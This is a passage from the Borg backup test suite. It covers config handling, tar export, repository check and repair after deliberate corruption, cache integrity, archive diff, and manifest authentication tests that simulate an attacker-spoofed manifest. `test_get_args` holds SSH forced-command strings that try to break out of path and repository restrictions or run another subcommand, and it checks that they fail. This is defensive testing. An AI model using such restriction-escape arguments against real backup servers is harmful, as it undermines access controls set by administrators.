self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('[repository]', output)
self.assert_in('version', output)
self.assert_in('segments_per_dir', output)
self.assert_in('storage_quota', output)
self.assert_in('append_only', output)
self.assert_in('additional_free_space', output)
self.assert_in('id', output)
self.assert_not_in('last_segment_checked', output)
output = self.cmd('config', self.repository_location, 'last_segment_checked', exit_code=1)
self.assert_in('No option ', output)
self.cmd('config', self.repository_location, 'last_segment_checked', '123')
output = self.cmd('config', self.repository_location, 'last_segment_checked')
assert output == '123' + '\n'
output = self.cmd('config', '--list', self.repository_location)
self.assert_in('last_segment_checked', output)
self.cmd('config', '--delete', self.repository_location, 'last_segment_checked')
for cfg_key, cfg_value in [
('additional_free_space', '2G'),
('repository.append_only', '1'),
]:
output = self.cmd('config', self.repository_location, cfg_key)
assert output == '0' + '\n'
self.cmd('config', self.repository_location, cfg_key, cfg_value)
output = self.cmd('config', self.repository_location, cfg_key)
assert output == cfg_value + '\n'
self.cmd('config', '--delete', self.repository_location, cfg_key)
self.cmd('config', self.repository_location, cfg_key, exit_code=1)
self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, exit_code=2)
self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
with changedir('output'):
# This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/input', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
if not shutil.which('gzip'):
pytest.skip('gzip is not installed')
self.create_test_files()
os.unlink('input/flagfile')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
# --list's path are those before processing with --strip-components
assert 'input/file1\n' in list
assert 'input/dir2\n' in list
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
self.assert_dirs_equal('input', 'output/', ignore_flags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
self._extract_hardlinks_setup()
self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
with changedir('output'):
subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
def test_detect_attic_repo(self):
path = make_attic_repo(self.repository_path)
cmds = [
['create', path + '::test', self.tmpdir],
['extract', path + '::test'],
['check', path],
['rename', path + '::test', 'newname'],
['list', path],
['delete', path],
['prune', path],
['info', path + '::test'],
['key', 'export', path, 'exported'],
['key', 'import', path, 'import'],
['key', 'change-passphrase', path],
['break-lock', path],
]
for args in cmds:
output = self.cmd(*args, fork=True, exit_code=2)
assert 'Attic repository detected.' in output
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
EXE = 'borg.exe'
FORK_DEFAULT = True
@unittest.skip('does not raise Exception, but sets rc==2')
def test_init_parent_dirs(self):
pass
@unittest.skip('patches objects')
def test_init_interrupt(self):
pass
@unittest.skip('patches objects')
def test_extract_capabilities(self):
pass
@unittest.skip('patches objects')
def test_extract_xattrs_errors(self):
pass
@unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
def test_basic_functionality(self):
pass
@unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
def test_overwrite(self):
pass
def test_fuse(self):
        if fakeroot_detected():
            # unittest.skip() called as a plain function only returns a decorator and skips nothing;
            # use skipTest() so the test is really skipped under fakeroot.
            self.skipTest('test_fuse with the binary is not compatible with fakeroot')
else:
super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
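        # shrink ChunkBuffer.BUFFER_SIZE so the archive item metadata stream is flushed into many
        # small chunks; the check/repair tests below rely on being able to delete individual
        # metadata and data chunks: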
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1')
self.create_src_archive('archive2')
def test_check_usage(self):
output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
self.assert_in('Checking segments', output)
# reset logging to new process default to avoid need for fork=True on next check
logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
self.assert_in('Starting repository check', output)
self.assert_not_in('Starting archive consistency check', output)
self.assert_not_in('Checking segments', output)
output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
self.assert_not_in('Starting repository check', output)
self.assert_in('Starting archive consistency check', output)
output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_not_in('archive2', output)
output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
self.assert_not_in('archive1', output)
self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
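        # a plain check detects the missing chunk (exit code 1); --repair replaces it with a
        # same-size all-zero replacement chunk and flags the file as broken, so it can be healed
        # later once the original chunk shows up again (see the "archive3" backup below):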
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
def spoof_manifest(self, repository):
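        # overwrite the manifest with one lacking the 'tam' authentication tag and carrying a
        # future timestamp, simulating a manifest written by an attacker or a pre-TAM borg version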
with repository:
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'config': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
def test_fresh_init_tam_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
def test_not_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
with repository:
shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
key.tam_required = False
key.change_passphrase(key._passphrase)
manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
del manifest[b'tam']
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
repository.commit(compact=False)
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM not found and not required' in output
# Run upgrade
self.cmd('upgrade', '--tam', self.repository_location)
# Manifest must be authenticated now
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM-verified manifest' in output
# Try to spoof / modify pre-1.0.9
self.spoof_manifest(repository)
# Fails
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
# Force upgrade
self.cmd('upgrade', '--tam', '--force', self.repository_location)
self.cmd('list', self.repository_location)
def test_disable(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
self.cmd('upgrade', '--disable-tam', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
assert not self.cmd('list', self.repository_location)
def test_disable2(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
self.cmd('upgrade', '--disable-tam', self.repository_location)
assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
prefix = '__testsuite__:'
def open_repository(self):
return RemoteRepository(Location(self.repository_location))
def test_remote_repo_restrict_to_path(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
# restricted to repo directory itself, fail for other directories with same prefix:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
# restricted to a completely different path:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
path_prefix = os.path.dirname(self.repository_path)
# restrict to repo directory's parent directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
# restrict to repo directory's parent directory and another directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
def test_remote_repo_restrict_to_repository(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
parent_path = os.path.join(self.repository_path, '..')
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location)
@unittest.skip('only works locally')
def test_debug_put_get_delete_obj(self):
pass
@unittest.skip('only works locally')
def test_config(self):
pass
@unittest.skip('only works locally')
def test_migrate_lock_alive(self):
pass
def test_strip_components_doesnt_leak(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file', contents=b"test file contents 1")
self.create_regular_file('dir/file2', contents=b"test file contents 2")
self.create_regular_file('skipped-file1', contents=b"test file contents 3")
self.create_regular_file('skipped-file2', contents=b"test file contents 4")
self.create_regular_file('skipped-file3', contents=b"test file contents 5")
self.cmd('create', self.repository_location + '::test', 'input')
marker = 'cached responses left in RemoteRepository'
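        # with --debug, RemoteRepository reports any responses still cached at shutdown;
        # the marker must never appear, proving that items excluded by --strip-components
        # do not leak pre-fetched chunks: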
with changedir('output'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
self.assert_true(marker not in res)
with self.assert_creates_file('file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
self.assert_true(marker not in res)
with self.assert_creates_file('dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
self.assert_true(marker not in res)
with self.assert_creates_file('input/dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
def corrupt(self, file, amount=1):
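        # flip all bits in the last `amount` bytes of the file, which is guaranteed to
        # invalidate its integrity data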
with open(file, 'r+b') as fd:
fd.seek(-amount, io.SEEK_END)
corrupted = bytes(255-c for c in fd.read(amount))
fd.seek(-amount, io.SEEK_END)
fd.write(corrupted)
def test_cache_chunks(self):
self.corrupt(os.path.join(self.cache_path, 'chunks'))
if self.FORK_DEFAULT:
out = self.cmd('info', self.repository_location, exit_code=2)
assert 'failed integrity check' in out
else:
with pytest.raises(FileIntegrityError):
self.cmd('info', self.repository_location)
def test_cache_files(self):
self.cmd('create', self.repository_location + '::test', 'input')
self.corrupt(os.path.join(self.cache_path, 'files'))
out = self.cmd('create', self.repository_location + '::test1', 'input')
# borg warns about the corrupt files cache, but then continues without files cache.
assert 'files cache is corrupted' in out
def test_chunks_archive(self):
self.cmd('create', self.repository_location + '::test1', 'input')
# Find ID of test1 so we can corrupt it later :)
target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
self.cmd('create', self.repository_location + '::test2', 'input')
# Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('info', self.repository_location, '--json')
chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
assert len(os.listdir(chunks_archive)) == 4 # two archives, one chunks cache and one .integrity file each
self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
# Trigger cache sync by changing the manifest ID in the cache config
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
# Cache sync notices corrupted archive chunks, but automatically recovers.
out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
assert 'Reading cached archive chunk index for test1' in out
assert 'Cached archive chunk index of test1 is corrupted' in out
assert 'Fetching and building archive index for test1' in out
def test_old_version_interfered(self):
# Modify the main manifest ID without touching the manifest ID in the integrity section.
# This happens if a version without integrity checking modifies the cache.
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
out = self.cmd('info', self.repository_location)
assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
# Setup files for the first snapshot
self.create_regular_file('empty', size=0)
self.create_regular_file('file_unchanged', size=128)
self.create_regular_file('file_removed', size=256)
self.create_regular_file('file_removed2', size=512)
self.create_regular_file('file_replaced', size=1024)
os.mkdir('input/dir_replaced_with_file')
os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
os.mkdir('input/dir_removed')
if are_symlinks_supported():
os.mkdir('input/dir_replaced_with_link')
os.symlink('input/dir_replaced_with_file', 'input/link_changed')
os.symlink('input/file_unchanged', 'input/link_removed')
os.symlink('input/file_removed2', 'input/link_target_removed')
os.symlink('input/empty', 'input/link_target_contents_changed')
os.symlink('input/empty', 'input/link_replaced_by_file')
if are_hardlinks_supported():
os.link('input/file_replaced', 'input/hardlink_target_replaced')
os.link('input/empty', 'input/hardlink_contents_changed')
os.link('input/file_removed', 'input/hardlink_removed')
os.link('input/file_removed2', 'input/hardlink_target_removed')
self.cmd('init', '--encryption=repokey', self.repository_location)
# Create the first snapshot
self.cmd('create', self.repository_location + '::test0', 'input')
# Setup files for the second snapshot
self.create_regular_file('file_added', size=2048)
self.create_regular_file('file_empty_added', size=0)
os.unlink('input/file_replaced')
self.create_regular_file('file_replaced', contents=b'0' * 4096)
os.unlink('input/file_removed')
os.unlink('input/file_removed2')
os.rmdir('input/dir_replaced_with_file')
self.create_regular_file('dir_replaced_with_file', size=8192)
os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
os.mkdir('input/dir_added')
os.rmdir('input/dir_removed')
if are_symlinks_supported():
os.rmdir('input/dir_replaced_with_link')
os.symlink('input/dir_added', 'input/dir_replaced_with_link')
os.unlink('input/link_changed')
os.symlink('input/dir_added', 'input/link_changed')
os.symlink('input/dir_added', 'input/link_added')
os.unlink('input/link_replaced_by_file')
self.create_regular_file('link_replaced_by_file', size=16384)
os.unlink('input/link_removed')
if are_hardlinks_supported():
os.unlink('input/hardlink_removed')
os.link('input/file_added', 'input/hardlink_added')
with open('input/empty', 'ab') as fd:
fd.write(b'appended_data')
# Create the second snapshot
self.cmd('create', self.repository_location + '::test1a', 'input')
self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
def do_asserts(output, can_compare_ids):
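            # can_compare_ids is True when both archives were created with identical chunker
            # params, so borg diff can detect changes from the chunk id lists alone; otherwise it
            # falls back to comparing contents and reports a plain "modified"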
# File contents changed (deleted and replaced with a new file)
change = 'B' if can_compare_ids else '{:<19}'.format('modified')
assert 'file_replaced' in output # added to debug #3494
assert '{} input/file_replaced'.format(change) in output
# File unchanged
assert 'input/file_unchanged' not in output
# Directory replaced with a regular file
if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
# Basic directory cases
assert 'added directory input/dir_added' in output
assert 'removed directory input/dir_removed' in output
if are_symlinks_supported():
# Basic symlink cases
assert 'changed link input/link_changed' in output
assert 'added link input/link_added' in output
assert 'removed link input/link_removed' in output
# Symlink replacing or being replaced
assert '] input/dir_replaced_with_link' in output
assert '] input/link_replaced_by_file' in output
# Symlink target removed. Should not affect the symlink at all.
assert 'input/link_target_removed' not in output
# The inode has two links and the file contents changed. Borg
# should notice the changes in both links. However, the symlink
# pointing to the file is not changed.
change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
assert '{} input/empty'.format(change) in output
if are_hardlinks_supported():
assert '{} input/hardlink_contents_changed'.format(change) in output
if are_symlinks_supported():
assert 'input/link_target_contents_changed' not in output
# Added a new file and a hard link to it. Both links to the same
# inode should appear as separate files.
assert 'added 2.05 kB input/file_added' in output
if are_hardlinks_supported():
assert 'added 2.05 kB input/hardlink_added' in output
# check if a diff between non-existent and empty new file is found
assert 'added 0 B input/file_empty_added' in output
# The inode has two links and both of them are deleted. They should
# appear as two deleted files.
assert 'removed 256 B input/file_removed' in output
if are_hardlinks_supported():
assert 'removed 256 B input/hardlink_removed' in output
# Another link (marked previously as the source in borg) to the
# same inode was removed. This should not change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_removed' not in output
# Another link (marked previously as the source in borg) to the
# same inode was replaced with a new regular file. This should not
# change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_replaced' not in output
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
# We expect exit_code=1 due to the chunker params warning
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
def test_sort_option(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('a_file_removed', size=8)
self.create_regular_file('f_file_removed', size=16)
self.create_regular_file('c_file_changed', size=32)
self.create_regular_file('e_file_changed', size=64)
self.cmd('create', self.repository_location + '::test0', 'input')
os.unlink('input/a_file_removed')
os.unlink('input/f_file_removed')
os.unlink('input/c_file_changed')
os.unlink('input/e_file_changed')
self.create_regular_file('c_file_changed', size=512)
self.create_regular_file('e_file_changed', size=1024)
self.create_regular_file('b_file_added', size=128)
self.create_regular_file('d_file_added', size=256)
self.cmd('create', self.repository_location + '::test1', 'input')
output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
expected = [
'a_file_removed',
'b_file_added',
'c_file_changed',
'd_file_added',
'e_file_changed',
'f_file_removed',
]
assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
archiver = Archiver()
# everything normal:
# first param is argv as produced by ssh forced command,
# second param is like from SSH_ORIGINAL_COMMAND env variable
args = archiver.get_args(['borg', 'serve', '--umask=0027', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --info')
assert args.func == archiver.do_serve
assert args.restrict_to_paths == ['/p1', '/p2']
assert args.umask == 0o027
assert args.log_level == 'info'
# similar, but with --restrict-to-repository
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --info --umask=0027')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break out of path restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --restrict-to-path=/')
assert args.restrict_to_paths == ['/p1', '/p2']
# trying to cheat - break out of repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break below repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/r1/below')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - try to execute different subcommand
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg init --encryption=repokey /')
assert args.func == archiver.do_serve
# Check that environment variables in the forced command don't cause issues. If the command
# were not forced, environment variables would be interpreted by the shell, but this does not
# happen for forced commands - we get the verbatim command line and need to deal with env vars.
args = archiver.get_args(['borg', 'serve', ],
'BORG_FOO=bar borg serve --info')
assert args.func == archiver.do_serve
def test_chunk_content_equal():
def ccc(a, b):
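        # run the comparison in both argument orders to make sure _chunk_content_equal is symmetric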
chunks_a = [data for data in a]
chunks_b = [data for data in b]
compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
assert compare1 == compare2
return compare1
assert ccc([
b'1234', b'567A', b'bC'
], [
b'1', b'23', b'4567A', b'b', b'C'
])
# one iterator exhausted before the other
assert not ccc([
b'12345',
], [
b'1234', b'56'
])
# content mismatch
assert not ccc([
b'1234', b'65'
], [
b'1234', b'56'
])
# first is the prefix of second
assert not ccc([
